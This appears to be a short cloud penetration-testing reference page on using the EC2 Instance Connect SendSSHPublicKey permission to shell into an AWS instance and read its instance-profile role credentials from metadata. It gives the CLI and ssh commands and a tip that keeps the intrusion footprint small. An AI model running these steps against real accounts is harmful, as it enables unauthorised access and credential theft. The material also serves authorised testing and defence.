EC2 Instance Connect pushes a short-lived SSH public key to a running instance's metadata for a 60-second login window. ec2-instance-connect:SendSSHPublicKey against an instance that carries a privileged instance profile gets you a shell on it, where IMDS hands out the profile role's credentials.
Push a key and connect#
aws ec2-instance-connect send-ssh-public-key \
--instance-id <id> --instance-os-user ec2-user \
--ssh-public-key "$(cat ~/.ssh/id_ed25519.pub)"
ssh ec2-user@<instance-ip> # within 60s of the push
# on the box, read the profile role creds from IMDS
Exploitation notes#
- You need network reachability to the instance (public IP or a route in), plus
SendSSHPublicKeyand the instance running the Instance Connect agent. - Once on the host, retrieval of the role credentials follows instance metadata.
- The pushed key is ephemeral, which keeps the footprint small compared with editing
authorized_keys.
Tools#
- AWS CLI (
ec2-instance-connect send-ssh-public-key).